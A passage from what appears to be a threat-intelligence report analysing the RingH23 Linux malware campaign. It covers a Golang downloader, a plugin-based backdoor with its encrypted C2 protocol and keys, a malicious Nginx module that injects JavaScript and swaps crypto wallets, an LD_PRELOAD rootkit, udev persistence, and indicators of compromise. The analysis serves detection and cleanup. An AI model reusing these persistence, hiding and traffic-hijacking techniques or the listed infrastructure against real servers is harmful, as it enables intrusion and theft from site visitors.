FROM edgeNodes AS n LEFT JOIN edgeNodeLogins AS l
ON n.id=l.nodeId WHERE n.state=1
</code></pre>
<p>After successfully obtaining the node login credentials, it executes the Main_SSHExec function, which logs into the edge nodes via SSH to download the next-stage payload.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_sshexec.png" alt="ring_sshexec.png" loading="lazy"></p>
<p>The core logic of Main_SSHExec is to execute the following script to deploy the next-stage download_init component on the edge node, where DOWNLOAD_URL is:<br>
<code>download.zhw[.]sh/EMrsVQj9VQ/init</code></p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_script.png" alt="ring_script.png" loading="lazy"></p>
<h2 id="0x2-downloadinit">0x2: download_init</h2>
<p>The basic information of the download_init component is shown below. It is a downloader implemented in Golang and protected with the standard UPX packer.</p>
<pre><code>MD5:5d6c33bf931699805206b00594de5e71
MAGIC:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
PACKER:UPX
</code></pre>
<p>The main purpose of download_init is to download the next-stage malicious payloads, including a backdoor Trojan, a rootkit, udev persistence rules, and an Nginx module.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_download.png" alt="ring_download.png" loading="lazy"></p>
<p>Similar to infect_init, download_init must also be executed with root privileges. In addition to the three parameters service_token, service_url, and group, it must also specify a run mode, such as &quot;install&quot; for installation or &quot;uninstall&quot; for removal.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_dlusage.png" alt="ring_dlusage.png" loading="lazy"></p>
<p>Unlike infect_init, after the group parameter passes validation, download_init extracts the hash field from the JSON data returned by the C2 server for use in subsequent register requests.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_hash.png" alt="ring_hash.png" loading="lazy"></p>
<p>Next, download_init attempts to retrieve information about the Nginx server on the compromised device, including the version number and compilation configuration parameters such as ngx_compat, ngx_dav, ngx_threads, and ngx_real_ip. It then uses this information to construct a register request in order to obtain the download URLs for the next-stage payloads. The URI format of this request is /api/register/{hash}.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_register-1.png" alt="ring_register.png" loading="lazy"></p>
<p>From the JSON data returned by the C2, the download URLs of various payloads can be observed. download_init extracts the hash field and uses it to complete the entire infection lifecycle. The specific steps are as follows:</p>
<p>First, it creates a directory named after the hash under /var/adm to store the downloaded malicious payloads.<br>
Next, it implants the udev_rules file into the system rules directory /etc/udev/rules.d, naming it 99-{hash}.rules to achieve persistence and automatic execution after system reboot.<br>
Then, it renames kernel.so to libutilkeybd.so and writes its path into /etc/ld.so.preload, leveraging the system&#x2019;s preload mechanism to conceal the malicious process activity.<br>
Finally, it launches the backdoor module office_bin to maintain persistent control over the infected device, and restarts the Nginx process to dynamically load the module.so module, hijacking traffic that meets specific conditions to redirect users to pornographic or gambling websites, thereby completing the deployment of all payloads.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_payloads.png" alt="ring_payloads.png" loading="lazy"></p>
<h2 id="0x3-officebin">0x3: office_bin</h2>
<p>office_bin is a highly modular and plugin-based backdoor Trojan that uses AES encryption for network communication. During dynamic analysis, a large number of strings related to redis2s are printed, so we named it badredis2s. It consists of three main components: Dropper, Client, and Plugin. Since the binaries are not stripped, reverse engineering is relatively straightforward and the functionality is clear at a glance.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_badredis.png" alt="ring_badredis.png" loading="lazy"></p>
<p>Dropper: First, let&#x2019;s look at the Dropper. The following sample is selected as the primary analysis target:</p>
<pre><code>MD5: 79c492bfd8a35039249bacc6a31d7122
MAGIC: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped
Packer: None
</code></pre>
<p>Its main purpose is to load an embedded ELF file and execute its exported function <code>kernel_module_entry</code>, with the parameter config_base64, which points to the encrypted configuration data.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_dropper.png" alt="ring_dropper.png" loading="lazy"></p>
<p>Client: The basic information of the file released by the Dropper is as follows:</p>
<pre><code>MD5:ae0de7034c4866556675740f6647bfcc
MAGIC:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
Packer: None
</code></pre>
<p>The core logic of the Client is concise and efficient:</p>
<p>It first decrypts the encrypted configuration to extract key parameters such as the C2 server address, task execution schedule, and communication keys. When the system time matches the predefined execution policy, the client attempts to establish a communication channel with the C2 server and waits to receive and execute remote commands.</p>
<p>Notably, this malware employs dual-layer redundancy mechanisms for both C2 acquisition and network transmission, enhancing robustness.</p>
<p><strong>&#xFF08;1&#xFF09;C2 Acquisition Mechanism</strong></p>
<ul>
<li>It first dynamically retrieves the latest C2 address from Microsoft Azure Blob Storage.</li>
<li>If cloud retrieval fails, it automatically falls back to a hardcoded backup C2 address.</li>
</ul>
<p><strong>&#xFF08;2&#xFF09;Network Transmission Mechanism</strong></p>
<ul>
<li>It prioritizes communication over WebSocket over TLS (wss).</li>
<li>If the wss connection fails due to firewall blocking or network restrictions, it switches to DNS tunneling as a fallback transmission method.</li>
</ul>
<p>The following sections analyze the Client&#x2019;s technical implementation in terms of configuration decryption, C2 acquisition, time validation, and network communication.</p>
<h4 id="%E2%91%A0-configuration-decryption">&#x2460; Configuration Decryption</h4>
<p>The configuration is protected using a simple &quot;xor + base64&quot; scheme. The base64 encoding uses the standard alphabet, and the XOR key is 0x23.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_config.png" alt="ring_config.png" loading="lazy"></p>
<p>The decrypted configuration contains information such as the C2 address, time rules, AES key, and initialization vector.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_decryptconfig.png" alt="ring_decryptconfig.png" loading="lazy"></p>
<h4 id="%E2%91%A1-c2-acquisition">&#x2461; C2 Acquisition</h4>
<p>The first 250 bytes of the configuration store the cloud configuration URL for the primary C2, followed by 278 bytes for the backup C2. The primary C2 must be dynamically retrieved via the cloud configuration, while the backup C2 can be used directly.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_c2.png" alt="ring_c2.png" loading="lazy"></p>
<p>Access the cloud configuration address of C2 Server 2, and you&apos;ll see an IIS logo page that appears perfectly normal. However, the secret is hidden in the webpage source code within the <code>RequestID:/#$*SRUNT0pNVltHSlBXUUwNTUZXGRcXEA==*#$/</code> section.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_mainc2.png" alt="ring_mainc2.png" loading="lazy"></p>
<p>The Client uses the regex pattern <code>\\s*/#\\$\\*.*?\\*#\\$/</code> to extract SRUNT0pNVltHSlBXUUwNTUZXGRcXEA==, which is actually an encrypted C2 configuration. After Base64 decoding and single-byte XOR with 0x23, it reveals the C2 server <strong>j6.linuxdistro.net:443</strong>, which is consistent with the backup C2 server.</p>
<h4 id="%E2%91%A2-time-window-validation">&#x2462; Time Window Validation</h4>
<p>The Client uses the <code>time_for_connect</code> function to determine whether execution is allowed at the current time. It reads a time whitelist from fixed offsets in the configuration (hour list starting at offset 0x210, minute list starting at offset 0x270) and compares it with the current system time.</p>
<p>However, according to the decrypted configuration, the current policy allows execution 24/7, with no restrictions on hours (0&#x2013;23) or minutes (0&#x2013;59).</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_timerule.png" alt="ring_timerule.png" loading="lazy"></p>
<h4 id="%E2%91%A3-network-communication">&#x2463; Network Communication</h4>
<p>The Client adopts a &#x201C;WSS-first, DNS-tunnel fallback&#x201D; dual-channel strategy. Through precise time control and failure-count mechanisms, it maintains C2 reachability while mimicking normal network traffic behavior as much as possible. When stealthy WSS communication is blocked, the sample switches to DNS tunneling within a limited time window to maintain control channel continuity, and later automatically reverts to the primary communication method.</p>
<p>Reverse engineering of the communication data shows that application-layer data within the WSS channel follows a &#x201C;compress &#x2192; encrypt&#x201D; process:</p>
<ul>
<li>
<p>zlib compression</p>
</li>
<li>
<p>AES-128-CBC encryption</p>
</li>
</ul>
<p>The AES key is read from offset 0x360 (16 bytes) in the configuration structure, and the IV is located at offset 0x370 (16 bytes).</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_configaes.png" alt="ring_configaes.png" loading="lazy"></p>
<p>The DNS tunnel implementation is based on the open-source tool <code>iodine</code>, which encapsulates IPv4 data into DNS requests and responses, enabling communication in environments where normal internet access is restricted but DNS queries are still allowed.</p>
<p>The related runtime parameters are stored at configuration offset <code>0x3E5</code>. From this, the Name Server 8.8.8.8 and the Top Domain nsj6.linuxdistro.net can be extracted.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_iodine.png" alt="ring_iodine.png" loading="lazy"></p>
<p>After receiving response data from the C2, the Client first performs AES decryption, then zlib decompression, and finally passes the parsed plaintext data to the <code>kernel_on_message</code> function, executing corresponding functional logic based on different command IDs.</p>
<table>
<thead>
<tr>
<th>Command ID</th>
<th>Function</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x01</td>
<td>Upload Device Info</td>
</tr>
<tr>
<td>0x02</td>
<td>Reboot</td>
</tr>
<tr>
<td>0x03</td>
<td>Shutdown</td>
</tr>
<tr>
<td>0x04</td>
<td>Edig Comment in redis2s-client</td>
</tr>
<tr>
<td>0x06</td>
<td>Edit Group in redis2s-client</td>
</tr>
<tr>
<td>0x08</td>
<td>Restart Client</td>
</tr>
<tr>
<td>0x0a</td>
<td>module info</td>
</tr>
<tr>
<td>0x0c</td>
<td>module data</td>
</tr>
<tr>
<td>0x12</td>
<td>run module</td>
</tr>
<tr>
<td>0x13</td>
<td>exit client</td>
</tr>
<tr>
<td>0x17</td>
<td>uninstall client</td>
</tr>
<tr>
<td>0x18</td>
<td>send help info</td>
</tr>
<tr>
<td>0x19</td>
<td>&quot;put, get, ps&quot; cmd</td>
</tr>
<tr>
<td>0x21</td>
<td>save file</td>
</tr>
<tr>
<td>0x22</td>
<td>quantity_execute</td>
</tr>
</tbody>
</table>
<p>Next, we illustrate the Client&#x2019;s network packet format using real traffic generated in a virtual machine. The intercepted wss traffic is shown below:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_wss.png" alt="ring_wss.png" loading="lazy"></p>
<p>Let&#x2019;s examine the first command sent from the C2 to the Client. After AES-CBC decryption and decompression, the plaintext is:<code>01 01 00 00 00 00 04 00 00 00 01 00 00 00</code><br>
The Client&#x2019;s network packet format follows:</p>
<blockquote>
<p>1-byte flag + 4-byte cmd count + 1-byte type + 4-byte cmd1 length + 4-byte cmd1</p>
</blockquote>
<p>Parsing the plaintext shows this is command <code>0x00000001</code>, requesting device information upload.</p>
<pre><code>#AES KEY: 2B990667D0E087AE
#AES IV:  27FAD11C481BD789

# CipherText

00000000  0e 1d 85 54 28 12 fb f2 9a 3c dd 02 6c 83 ed f9  |...T(.&#xFB;&#xF2;.&lt;&#xDD;.l.&#xED;&#xF9;|
00000010  87 3d 0d 46 1c 94 9d 46 26 55 5c 2a 9a 72 1c aa  |.=.F...F&amp;U\*.r.&#xAA;|

#PlainText

00000000  01 01 00 00 00 00 04 00 00 00 01 00 00 00        |..............|
flag:1
cmd count: 1
type: 0
cmd1 length:4
cmd1: 0x00000001

</code></pre>
<p>If readers attempt to decrypt the second command using the provided CyberChef workflow, they will find decryption fails. This is because, unlike standard AES-CBC mode, Badredis2s uses <code>AES-CBC with chained IV</code>, meaning the IV for each message is the last ciphertext block of the previous message.</p>
<p>To decrypt the second command, the IV must be set to the last 16 bytes of the first ciphertext: <code>87 3d 0d 46 1c 94 9d 46 26 55 5c 2a 9a 72 1c aa</code></p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_chainiv.png" alt="ring_chainiv.png" loading="lazy"></p>
<p>Finally, let&#x2019;s look at the Plugin component. In Badredis2s, command 0x12 is related to plugin operations.</p>
<p>After implementing the Badredis2s network protocol in our command-tracking system, we successfully tracked command 0x12 and captured two plugins: shell and filemanager. Each plugin has its own dedicated Request-URI:</p>
<ul>
<li>
<p>shell &#x2192; /index/sl.html</p>
</li>
<li>
<p>filemanager &#x2192; /index/fm.html</p>
</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_cmd12.jpg" alt="ring_cmd12.jpg" loading="lazy"></p>
<p>During analysis of the <code>filemanager</code> plugin, three additional plugins were discovered. Observing naming patterns reveals a correlation between plugin names and paths. By brute-forcing paths, we identified a new URI <code>/index/ao.html</code>, though we were unable to infer its corresponding plugin name or capture it.</p>
<table>
<thead>
<tr>
<th>Plugin Name</th>
<th>Request-URI</th>
</tr>
</thead>
<tbody>
<tr>
<td>filesearch</td>
<td>/index/fs.html</td>
</tr>
<tr>
<td>filetransport</td>
<td>/index/ft.html</td>
</tr>
<tr>
<td>filedownloader</td>
<td>/index/fd.html</td>
</tr>
</tbody>
</table>
<p>The functionality of the plugins is reflected in their names: for example, shell executes shell commands, while filemanager handles file management.</p>
<p>This plugin-based architecture significantly enhances Badredis2s&#x2019; flexibility. Attackers can easily perform complex tasks by deploying different functional plugins. Since these plugins are neither obfuscated nor stripped, analysis is relatively straightforward. Readers interested in implementation details may further explore them independently; this article does not elaborate further.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_plugins.png" alt="ring_plugins.png" loading="lazy"></p>
<h2 id="0x4-moduleso">0x4: module.so</h2>
<p>module.so is a malicious Nginx filtering module, which we name Badnginx2s. Its basic information is as follows:</p>
<pre><code>MD5: 563f5e605ebf1db8065fd41799e71bf9
MAGIC: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
Packer: None
</code></pre>
<p>Badnginx2s is a relatively rare Nginx backdoor Trojan. Essentially, it is an Nginx module that implants a malicious filter at the web server layer to deeply tamper with outbound traffic. Its main functions include:</p>
<ul>
<li>
<p>Remote Command Execution: A covert command channel is reserved for executing remote commands.</p>
</li>
<li>
<p>Download Hijacking: When users download specific types of files from an infected website, the Trojan secretly replaces the download link.</p>
</li>
<li>
<p>Code Injection: Injects malicious JavaScript into webpages to redirect visitors to gambling, pornographic, or other malicious websites, monetizing traffic or facilitating further fraud.</p>
</li>
<li>
<p>Video Insertion: Inserts a 5-second malicious media segment into M3U8 playlist files for streaming hijacking or advertisement injection.</p>
</li>
<li>
<p>Digital Asset Theft: Replaces cryptocurrency wallet addresses on webpages with attacker-controlled addresses, silently diverting user transfers and enabling covert financial theft.</p>
</li>
</ul>
<p>Badnginx2s implements these functions by registering two HTTP filter functions: ngx_http_hello_header_filter and ngx_http_hello_body_filter.</p>
<ul>
<li>
<p>The header_filter handles the HTTP response header stage, performing remote command execution, policy updates, download hijacking, and marking specific pages for malicious injection.</p>
</li>
<li>
<p>The body_filter processes the HTTP response body stage, injecting malicious JavaScript and replacing wallet addresses on the client side.</p>
</li>
</ul>
<p>This design enables Badnginx2s to flexibly perform stealthy and precise malicious operations at different response stages, achieving both server-side remote control and client-side theft and fraud.</p>
<h4 id="%E2%91%A0-remote-command-execution">&#x2460; Remote Command Execution</h4>
<p>The attacker hides remote commands in the Cookie field of HTTP request headers for covert communication.</p>
<ul>
<li>The comm field stores the encrypted command, originally formatted as &quot;timestamp$$command&quot; (e.g., 1768813387$$whoami). It is first XOR-encrypted with key 0x5A, then Base64-encoded before transmission.</li>
</ul>
<p>= The sign field contains a Base64-encoded digital signature generated using the P-256 elliptic curve. Badnginx2s verifies the signature using a public key to ensure command integrity and authenticity.</p>
<p>This mechanism allows attackers to execute remote commands within seemingly normal HTTP requests.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_execcmd.png" alt="ring_execcmd.png" loading="lazy"></p>
<h4 id="%E2%91%A1-config-manipulation">&#x2461; Config Manipulation</h4>
<p>Badnginx2s dynamically generates hijacking configurations at runtime, including redirect domains, malicious JS payload URLs, and whitelist IP ranges.</p>
<p>To enable remote real-time configuration control, attackers establish a covert management channel via Cookie fields:</p>
<ul>
<li>
<p>Configuration operation commands are encrypted and stored in the conf field (using the same XOR + Base64 method as comm).</p>
</li>
<li>
<p>The digital signature is stored in the sign field and validated using the P-256 elliptic curve algorithm.</p>
</li>
</ul>
<p>For example, to query the current configuration, the original command <code>get$$</code> is encrypted and placed in the conf field. After signature verification, the server returns the current configuration. This mechanism allows attackers to dynamically adjust redirect domains, malicious JS payload addresses, and other parameters.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_getconf.png" alt="ring_getconf.png" loading="lazy"></p>
<h4 id="%E2%91%A2-download-hijacking">&#x2462; Download Hijacking</h4>
<p>When requests target APK, PLIST, or MOBILECONFIG resources, Badnginx2s performs download hijacking. It dynamically constructs domains using the format:<code>https://%s.aqyaqua.com</code> and returns corresponding malicious payloads.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_dlhijack.png" alt="ring_dlhijack.png" loading="lazy"></p>
<p>Notably, aqyaqua.com serves only as a traffic gateway, forwarding different resource types to separate target addresses. Currently, only the APK payload remains active.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_b9apk.png" alt="ring_b9apk.png" loading="lazy"></p>
<h4 id="%E2%91%A3-page-tampering">&#x2463;  Page Tampering</h4>
<p>Badnginx2s performs webpage tampering via the ngx_http_hello_body_filter function, including wallet replacement, video insertion, and malicious JS injection.</p>
<ul>
<li>Cryptocurrency Wallet Replacement</li>
</ul>
<p>When Ethereum or TRON wallet addresses appear in webpage content, they are replaced with attacker-controlled addresses.</p>
<p>For example:</p>
<ul>
<li>
<p>Ethereum &#x2192; 0xAA3Bd92445a2E1fE38C7693d77259BeD42a144c3</p>
</li>
<li>
<p>TRON &#x2192; TCMCY9ccNmQGfUNHTNtCByCof3VdQnip2b</p>
</li>
</ul>
<p>This enables silent transaction hijacking without user awareness.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_cryptoaddr.png" alt="ring_cryptoaddr.png" loading="lazy"></p>
<ul>
<li>Video Insertion</li>
</ul>
<p>When targeting webpages related to HLS live streams, attackers modify M3U8 playlist files to insert custom video segments.</p>
<p>We have captured one instance where a 5-second segment named &#x5E7F;&#x544A;_1.ts was inserted. Although seemingly an advertisement insertion, the potential risks are far greater. Attackers could replace content with pornography, violence, AI-generated political propaganda, fake news, or highly convincing deepfake videos. Such attacks could disrupt public opinion, manipulate ideology, and interfere with social order, representing a highly scalable and socially harmful attack vector.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_video.png" alt="ring_video.png" loading="lazy"></p>
<ul>
<li>Malicious JS Injection</li>
</ul>
<p>For HTML pages, Badnginx2s searches tags in priority order: <code>&lt;head&gt;, &lt;/title&gt;, &lt;html&gt;, &lt;meta&gt;, &lt;script&gt;,</code> and injects malicious JavaScript at the first matching location.</p>
<p>The injected JS follows a fixed template concatenated with a Base64 string corresponding to the previously analyzed JS loader.</p>
<p>The hardcoded Base64 string in the sample:<code>aHR0cHM6Ly9jZG5qcy5qc2RjbGl2ci5jb20vbnBtL2Jvb3RzdHJhcEA1LjMuMC9kaXN0L2Nzcy9ib290c3RyYXAubWluLmNzcz92PTMuNy44LjI=</code>&#xFF0C;decodes to:<code>https://cdnjs[.]jsdclivr[.]com/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css?v=3.7.8.2</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_jstemp.png" alt="ring_jstemp.png" loading="lazy"></p>
<h2 id="0x5-libutilkeybdso">0x5: libutilkeybd.so</h2>
<p>libutilkeybd.so is a userland rootkit based on LD_PRELOAD technology, which we name Badhide2s. Its basic information is:</p>
<pre><code>MD5: 85cdf5139f0a0a0f7e378bc2029d662b
MAGIC: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
Packer: None
</code></pre>
<p>The core objectives of Badhide2s are:</p>
<ul>
<li>
<p>Payload Trace Concealment</p>
</li>
<li>
<p>Dynamic Injection of the Nginx Module</p>
</li>
</ul>
<ul>
<li><strong>Concealment</strong> By writing itself into /etc/ld.so.preload, it ensures automatic loading and filters outputs of common tools such as ss, netstat, top, htop, ps, ls, and lsof, hiding traces across three dimensions: files, processes, and network connections.This userland rootkit technique is common in Linux malware. While Badhide2s introduces no major technical innovations, it hides 25 IP addresses&#x2014;relatively large in scale.</li>
<li><strong>Module Injection</strong>&#xFF1A;By hooking <code>__libc_start_main</code> (the GNU C library entry function), it inspects processes at startup. When detecting Nginx, it modifies startup parameters to append:<code>-g load_module /var/adm/{hash}nginx/module.so</code>. thus stealthily loading the malicious module.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_ngxload.png" alt="ring_ngxload.png" loading="lazy"></p>
<p>Notably, Badhide2s includes an environment variable trigger switch: if the environment variable RING04 exists and matches a specific hash value, all hiding functions are automatically disabled. This provides defenders with a rapid investigation method&#x2014;after obtaining the hash, executing:<code>export RING04H={hash}</code> instantly disables concealment and reveals hidden processes, files, and network connections.</p>
<h2 id="0x6-udev-rule-script">0x6: udev rule &amp; script</h2>
<p>Using udev rules for persistence is uncommon in Linux threats. Public cases include sedexp and UNC3886. udev is Linux&#x2019;s device management system responsible for dynamically managing /dev device nodes and handling hotplug events. Rules are typically located in:</p>
<ul>
<li>
<p>/etc/udev/rules.d/</p>
</li>
<li>
<p>/lib/udev/rules.d/</p>
</li>
</ul>
<p>A typical rule:</p>
<pre><code>ACTION==&quot;add&quot;, KERNEL==&quot;device&quot;, RUN+=&quot;/path/to/script&quot;
</code></pre>
<p>In this campaign, a rule named 99-{hash}.rules is added under /etc/udev/rules.d. When any non-loopback network interface is recognized (add event), it triggers systemd-run to stealthily execute: <code>/var/adm/{hash}/udev/udev.sh</code> &#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_udevrules.jpg" alt="ring_udevrules.jpg" loading="lazy"></p>
<p>The udev.sh script simply launches the previously analyzed Badredis2s backdoor (ring04h_office_bin) and an unknown component (ring04h_agent_bin).</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_udevsh.jpg" alt="ring_udevsh.jpg" loading="lazy"></p>
<h1 id="additional-intelligence">Additional Intelligence</h1>
<p>Within download_init, a main_pre function cleans up traces strongly associated with RingH23. The cleanup array contains 17 strings, including libcext.so.2 and /var/log/cross/auto-colar, which are clearly related to the autocolor backdoor disclosed by Palo Alto Networks on February 24, 2025.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_specialstring.jpg" alt="ring_specialstring.jpg" loading="lazy"></p>
<p>Additionally, /var/log/jroqq is a highly distinctive string. Using it as a clue, we identified a Golang-based backdoor named auto-color.</p>
<p>This backdoor enforces single-instance execution via a file lock /var/log/jroqq/auto.l, though it does not create this file itself&#x2014;indicating coordination with other components. Internally, we refer to it as V2deck.</p>
<p>Its primary function is to execute C2-issued commands and return results. The sample embeds 10 C2 addresses protected by XOR + Base64 (XOR key: poop).</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_v2deck.jpg" alt="ring_v2deck.jpg" loading="lazy"></p>
<p>Observed commands indicate V2deck collects information about Nginx and FikkerCDN processes, aligning with RingH23 targets:</p>
<pre><code>ps -ef | grep Fikker | grep -v grep | wc -l

ss -antp | grep nginx |grep ESTAB | awk {&apos;print $5&apos;} | awk -F\: {&apos;print $1&apos;} | sort | uniq | wc -l

</code></pre>
<p>Although we currently associate V2deck with RingH23 at medium confidence, its extremely low detection rate and C2 visibility warrant public disclosure alongside this report.</p>
<h1 id="conclusion">Conclusion</h1>
<p>This summarizes most of the intelligence currently available regarding Funnull&#x2019;s new cybercriminal campaign.</p>
<p>We strongly recommend that network administrators and website owners conduct immediate self-inspections and follow these mitigation guidelines:</p>
<h4 id="%E2%91%A0-for-ringh23">&#x2460; For RingH23</h4>
<p>Use ldd to check command dependencies, focusing on the malicious module:<code>/var/adm/{uuid}/kernel/libutilkeybd.so</code>&#x3002;<br>
If found:</p>
<ul>
<li>
<p>Set environment variable RING04H={uuid} to disable rootkit protection.</p>
</li>
<li>
<p>Remove malicious artifacts:</p>
<ul>
<li>
<p>Related entries in /etc/ld.preload.conf</p>
</li>
<li>
<p>/etc/udev/99-{uuid}.rules</p>
</li>
<li>
<p>All files under /var/adm/{uuid}</p>
</li>
</ul>
</li>
</ul>
<h4 id="%E2%91%A1-for-maccmspla">&#x2461; For maccmsp[.]la</h4>
<p>It is not recommended to continue using maccms[.]la.</p>
<p>If migration is not possible:</p>
<ul>
<li>
<p>Use grep xxSJRox to check template JS injection.</p>
</li>
<li>
<p>Use grep gzuncompress to check for suspicious hidden PHP payloads.</p>
</li>
<li>
<p>Remove:</p>
<ul>
<li>
<p>/application/extra/active.php</p>
</li>
<li>
<p>/application/admin/controller/Update.php</p>
</li>
<li>
<p>Modify the AJAX upgrade domain in: /application/admin/view_new/index/index.html</p>
</li>
</ul>
</li>
</ul>
<p>Such cybercriminal operations are profit-driven and persistent. Only through cross-industry collaboration and intelligence sharing can they be effectively contained.</p>
<p>We invite security vendors and technical institutions to collaborate with us in intelligence sharing and coordinated response efforts. If you are interested in our research or possess relevant insights, feel free to contact us via the <a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X platform</a>.</p>
<h1 id="ioc">IOC</h1>
<h4 id="badredis2s-c2">Badredis2s C2</h4>
<pre><code>ntp[.]asia
ntporg[.]com
sbindns[.]com
plusedns[.]com
mirrors163[.]com
linuxdistro[.]net
debianhacks[.]net
fedoraforums[.]net
ubuntucommands[.]com
</code></pre>
<h4 id="badredis2s-c2-config-url">Badredis2s C2 Config URL</h4>
<pre><code>https://3snzh72om4.apifox[.]cn
https://node.blob.core.windows[.]net/update/a1
https://node.blob.core.windows[.]net/update/a2
https://node.blob.core.windows[.]net/update/s7
https://node.blob.core.windows[.]net/update/s10
https://node.blob.core.windows[.]net/update/s11
https://node.blob.core.windows[.]net/update/s14
https://node.blob.core.windows[.]net/update/h2.debianhacks.net/online
https://node.blob.core.windows[.]net/update/j6.linuxdistro.net/online

https://az-blob.110[.]nz/update/s1
https://az-blob.110[.]nz/update/s2
https://az-blob.110[.]nz/update/s3
https://az-blob.110[.]nz/update/s4
https://az-blob.110[.]nz/update/s7
https://az-blob.110[.]nz/update/s9

</code></pre>
<h4 id="badnginx2s-related">Badnginx2s Related</h4>
<pre><code>gadlkd1[.]com

apk.aqyaqua[.]com
plist.aqyaqua.]com
mobileconfig.aqyaqua[.]com

https://dowoxox.gfewr[.]com/B9.apk
https://plist.ztyfv[.]com/d/4F48MCiqtsjDCS7QOWs3KU.plist
https://download.joymeet[.]top/app/2PG/00056321.mobileconfig
</code></pre>
<h4 id="v2deck-c2">V2deck C2</h4>
<pre><code>bobolickp92[.]cc
realfake909[.]net
firelategg[.]net
lucycally[.]me
moxymodiy[.]cc
9688hopeeasy[.]cc
flysky55[.]me
goyppg06[.]com
tutupytua[.]com
zybbzlast[.]com

</code></pre>
<h4 id="ips-domains-in-badhide2s">IPs &amp; Domains in Badhide2s</h4>
<pre><code>54.46.13.139
8.139.6.156
18.167.103.220
18.163.102.174
16.163.50.192
43.199.147.209
13.251.54.69
43.199.133.158
18.166.58.136
16.162.25.97
52.221.206.136
43.198.221.151
43.198.137.198
43.198.73.3
16.163.58.55
20.6.129.16
20.205.25.192
35.75.5.45
52.195.191.106
52.195.7.27
52.196.178.89
52.194.222.58
13.231.108.219
13.114.119.159
3.112.67.113
54.46.1.220

js.mirrors163[.]com
cn.js.mirrors163[.]com
update.ntporg[.]com
js.ntp[.]asia
js.ntporg[.]com
s10.ntporg[.]com
s11.ntporg[.]com
client.110[.]nz
js2.ntporg[.]com
a.plusedns[.]com
b.plusedns[.]com
js.sbindns[.]com
</code></pre>
<h4 id="js-host">JS HOST</h4>
<pre><code>jquecy[.]com
jsdclivr[.]com
jsdelivr[.]vip
bytedauce[.]com
bdustatic[.]com
clondflare[.]com
macoms[.]la
ailyunoss[.]com
ailyun-oss[.]com
</code></pre>
<h4 id="js-payload-url">JS PAYLOAD URL</h4>
<pre><code>https:]//code.jquecy[.]com/jquery.min-3.6.8.js
https://cdnjs.clondflare[.]com/jquery.min-3.7.8.1.js

https:]//cdnjs.jsdclivr[.]com/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css?v=3.7.8.2
https:]//static.bytedauce[.]com/ajax/libs/bootstrap/5.3.3/css/bootstrap-grid.min.css

https:]//union.macoms[.]la/jquery.min-4.0.2.js
https:]//cdn.jsdelivr[.]vip/jquery.min-3.7.0.js
https:]//api.bdustatic[.]com/jquery.min-4.0.12.js

</code></pre>
<h4 id="downloader-url">Downloader URL</h4>
<pre><code>https://az-blob.110[.]nz/update/init
http://download.zhw[.]sh/wK4QYDIRFV/init
http://download.zhw[.]sh/9aE5EFdJoS/init

https://bucket.service.generate.110[.]nz/udev.sh

https://bucket.service.generate.110[.]nz/2025-12-19/7d1d49a8d8c1fa7b4b743ed551fa338c112268e1/module.so

https://bucket.service.generate.110[.]nz/2025-12-19/7d1d49a8d8c1fa7b4b743ed551fa338c112268e1/udev.rules

https://bucket.service.generate.110[.]nz/2025-12-19/7d1d49a8d8c1fa7b4b743ed551fa338c112268e1/kernel.so

</code></pre>
<h4 id="video-ad-url">VIDEO AD URL</h4>
<pre><code>https://oss2025-6f57.obs.ap-southeast-1.myhuaweicloud[.]com/%E5%B9%BF%E5%91%8A_1.ts
</code></pre>
<h4 id="sample-md5">Sample MD5</h4>
<pre><code>663706d4f3948417d05c11bbfa6cdbc9 *init
65ac2839ab2790b6df8e80022982a2c0 *init
5d6c33bf931699805206b00594de5e71 *init

85cdf5139f0a0a0f7e378bc2029d662b *kernel.so
